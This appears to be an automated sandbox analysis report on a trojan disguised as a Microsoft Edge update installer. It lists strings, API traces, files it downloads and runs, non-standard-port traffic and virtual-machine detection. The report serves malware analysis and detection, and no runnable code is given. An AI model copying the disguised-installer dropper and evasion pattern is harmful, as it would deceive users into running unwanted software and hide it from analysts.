Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RuntimeBrokers.exe, RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.drString found in binary or memory: http://lol.qq.com/client/client.shtml?uin=%u&area=%u&timestamp=%u&Signature=%s
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: RuntimeBrokers.exe, RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C103E77: CreateFileW,GetLastError,??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z,CloseHandle,DeviceIoControl,GetLastError,??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z,CloseHandle,1_2_6C103E77
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_001788FD0_2_001788FD
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016D1450_2_0016D145
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0017726C0_2_0017726C
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_001753080_2_00175308
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0017738C0_2_0017738C
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_001674A90_2_001674A9
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00174E700_2_00174E70
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0043E17A1_2_0043E17A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004DE4901_2_004DE490
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004F459C1_2_004F459C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004D47101_2_004D4710
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0044C93C1_2_0044C93C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004C49A91_2_004C49A9
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004B0A401_2_004B0A40
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004C4BD81_2_004C4BD8
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004B0BE21_2_004B0BE2
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00504BE01_2_00504BE0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004C50411_2_004C5041
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004DF3AA1_2_004DF3AA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0043D4F31_2_0043D4F3
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004C59961_2_004C5996
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004D5BA01_2_004D5BA0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004C5E5F1_2_004C5E5F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00505EF01_2_00505EF0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0A6D101_2_6C0A6D10
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C16677A1_2_6C16677A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0C7E9A1_2_6C0C7E9A
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: String function: 001689D0 appears 33 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 0046C76B appears 157 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 00409053 appears 52 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 0046C66E appears 138 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 6C1C2F1B appears 334 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 6C1C2F4F appears 207 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 6C0BE945 appears 154 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 004AF019 appears 74 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 6C1C2F86 appears 82 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: String function: 00508550 appears 34 times
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: invalid certificate
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: RuntimeBrokers.exe.0.drBinary string: GetNativeSystemInfokernel32IsWow64Processkernel32\Device\HarddiskVolume:[KillAllProcess]create snapshot fail[KillAllProcess]process: [KillAllProcess]kill failed
Source: common.dll.0.drBinary string: [Sys_wrapper]WritePrivateProfile fail, session:{}, key:{}, file:{}NtSuspendProcessntdllNtResumeProcess[Sys_wrapper]GetStrValueFromReg, open reg key failed, key:{}, error:{}[Sys_wrapper]GetStrValueFromReg, get reg value failed, key:{}, value_name:{}, error:{}[Sys_wrapper]GetStrValueFromReg, invalid size[Sys_wrapper]SetRegValue, open reg path failed, path:{}, error:{}[Sys_wrapper]SetRegValue, set reg value failed, path:{}, value_name:{}, value:{}, error:{}[Sys_wrapper]ACLineStatus:{},BatteryFlag:{}kernel32\Device\HarddiskVolume\\.\PhysicalDrive%dA:\%SystemDrive%\ :TENINSTIPGlobal\%s_%X_%dd:\ci_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h[ProcessHelp][RetrieveGameImagePathByProcessId]MapViewOfFile fail, hListMap:%p, err:%d[ProcessHelp][RetrieveGameImagePathByProcessId]OpenFileMappingA fail, iamge path:%s, err:%dH:3
Source: classification engineClassification label: mal60.troj.evad.winEXE@3/4@0/2
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00163E83 GetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree,0_2_00163E83
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00161F55 SHGetKnownFolderPath,GetDiskFreeSpaceExW,CoTaskMemFree,0_2_00161F55
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0047C0FD CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessImageFileNameW,CloseHandle,Process32NextW,CloseHandle,1_2_0047C0FD
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C156FE1 ?TaskBarPin@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@Z,__EH_prolog3_GS,?IsWin10_OS@Sys_wrapper@common@ierd_tgp@@SA_NXZ,ShellExecuteW,GetCurrentProcess,?ChangeProcessImageName@Sys_wrapper@common@ierd_tgp@@SA_NPAXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z,CoInitialize,memset,LoadLibraryW,LoadStringW,CoCreateInstance,memset,wcscpy_s,PathRemoveFileSpecW,wcscpy_s,PathStripPathW,SysFreeString,VariantClear,VarBstrCmp,SysFreeString,SysFreeString,SysFreeString,VariantClear,CoUninitialize,FreeLibrary,1_2_6C156FE1
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_001627A1 FindResourceW,SizeofResource,0_2_001627A1
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUF98A.tmpJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exeJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeMutant created: NULL
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUF98A.tmpJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCommand line argument: kernel32.dll0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCommand line argument: async0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCommand line argument: /%s0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCommand line argument: /%s0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCommand line argument: asyncupdate0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCommand line argument: /%s0_2_00163109
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: RuntimeBrokers.exeString found in binary or memory: -launcher
Source: MicrosoftEdgeUpdateSetup.exeString found in binary or memory: %1!s!-Installationsprogramm
Source: MicrosoftEdgeUpdateSetup.exeString found in binary or memory: r das %1!s!-Installationsprogramm ist Windows 2000 Service Pack 4 oder h
Source: MicrosoftEdgeUpdateSetup.exeString found in binary or memory: %1!s!-installeerder
Source: MicrosoftEdgeUpdateSetup.exeString found in binary or memory: Onbekende InstalleerderfoutTKon nie installeer nie. %1!s!-installeerder vereis Windows 2000 Dienspak 4 of beter.PAMicrosoft
Source: MicrosoftEdgeUpdateSetup.exeString found in binary or memory: ruf fl-Installatur _L-installazzjoni ma rnexxietx. %1!s! Installatur je'
Source: MicrosoftEdgeUpdateSetup.exeString found in binary or memory: %1!s! Installer&Hindi Alam na Error sa Installer ErrorZHindi na-install. Kailangan ng %1!s! Installer ang Windows 2000 Service Pack 4 o mas bago.Microsoft
Source: unknownProcess created: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe "C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe"
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe"
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe" Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: common.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: MicrosoftEdgeUpdateSetup.exeStatic file information: File size 1634896 > 1048576
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x166200
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\ci_dev\wegame_client\build\bin\Release\tcls_core.pdb source: RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: mi_exe_stub.pdb source: MicrosoftEdgeUpdateSetup.exe
Source: Binary string: D:\ci_dev\wegame_client\build\lib\Release\common.pdb source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: #lkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0045E100 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_0045E100
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: real checksum: 0x198153 should be: 0x190fbb
Source: common.dll.0.drStatic PE information: real checksum: 0x3bfec6 should be: 0x3c4694
Source: common[1].dll.0.drStatic PE information: real checksum: 0x3bfec6 should be: 0x3c4694
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: section name: .didat
Source: common[1].dll.0.drStatic PE information: section name: .QMGuid
Source: common.dll.0.drStatic PE information: section name: .QMGuid
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00179167 push ecx; ret 0_2_00179166
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004AEFE2 push ecx; ret 1_2_004AEFF5
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004AF236 push ecx; ret 1_2_004AF249
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C1C2EE4 push ecx; ret 1_2_6C1C2EF7
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00166690 URLDownloadToFileA,URLDownloadToFileA,ShellExecuteA,exit,0_2_00166690
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\common[1].dllJump to dropped file
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeFile created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeJump to dropped file
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exeJump to dropped file
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeFile created: C:\Users\user\AppData\Roaming\common.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0041ABA7 GetPrivateProfileIntW,1_2_0041ABA7
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00478D13 GetPrivateProfileIntW,1_2_00478D13
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004517EF SHGetFolderPathW,GetPrivateProfileIntW,1_2_004517EF
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00451970 SHGetFolderPathW,GetPrivateProfileStringW,1_2_00451970

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknownNetwork traffic detected: HTTP traffic on port 16653 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknownNetwork traffic detected: HTTP traffic on port 16653 -> 49730
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Found evasive API chain checking for user administrative privileges
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-14594
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0044D2F4 rdtsc 1_2_0044D2F4
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: ?get_first_mac2@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,__EH_prolog3_catch_GS,GetAdaptersInfo,GetAdaptersInfo,?get_log_instance@base@@YAPAVILogger@1@XZ,__Init_thread_footer,1_2_6C127C98
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\common[1].dllJump to dropped file
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeEvaded block: after key decisiongraph_0-14983
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeAPI coverage: 0.9 %
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_0016207E
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016231F FindFirstFileExW,GetSystemTimeAsFileTime,FindNextFileW,FindClose,0_2_0016231F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00484A62 FindFirstFileW,MoveFileExW,CopyFileW,FindNextFileW,FindClose,1_2_00484A62
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0046CDBA FindFirstFileW,_wcsrchr,_wcsrchr,DeleteFileW,FindNextFileW,FindClose,1_2_0046CDBA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00468440 GetLogicalDriveStringsW,QueryDosDeviceW,1_2_00468440
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0017B9B7 VirtualQuery,GetSystemInfo,0_2_0017B9B7
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Gc
Source: common.dll.0.drBinary or memory string: WQLSELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=TRUEroot\cimv2Win32_NetworkAdapterConfigurationSetDNSServerSearchOrderDNSServerSearchOrderIndexCaptionvmwarevirtualWin32_NetworkAdapterConfiguration.Index=%d[repair_dns] success.
Source: RuntimeBrokers.exeBinary or memory string: vmware
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
